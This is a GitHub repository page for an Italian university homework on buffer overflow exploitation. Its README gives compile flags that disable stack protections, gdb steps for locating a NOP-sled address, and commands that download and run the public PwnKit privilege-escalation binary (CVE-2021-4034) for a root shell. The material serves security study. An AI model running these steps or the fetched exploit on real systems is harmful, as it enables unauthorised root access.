Skip to content

Homework di sicurezza informatica riguardo il buffer overflow

Notifications You must be signed in to change notification settings

rickythewoof/HW_sicurezza

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

12 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

FILE PER Homework di sicurezza informatica

Remember to check with checksec the attributes of main.o and disable ASLR!

gcc -o main.o main.c -fno-stack-protector -z execstack

Guardo com'è strutturata la stack e becco l'indirizzo iniziale di stack

disas oflow (set breakpoint after strcpy) run $(python3 -c "print(b'A'*30)") x/200xb $esp

L'indirizzo di inizio stack 0xbfffee2c (verrà poi scritto little-endian e aumentato leggermente per puntare alla nop sled)

Per effettuare il privilege escalation è possibile utilizzare

curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit32 -o PwnKit
chmod +x ./PwnKit
./PwnKit # interactive shell
./PwnKit 'id' # single command

The source for this attack is HERE, and it's based on CVE-2021-4034 La relazione si trova nel form google nel link

About

Homework di sicurezza informatica riguardo il buffer overflow

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages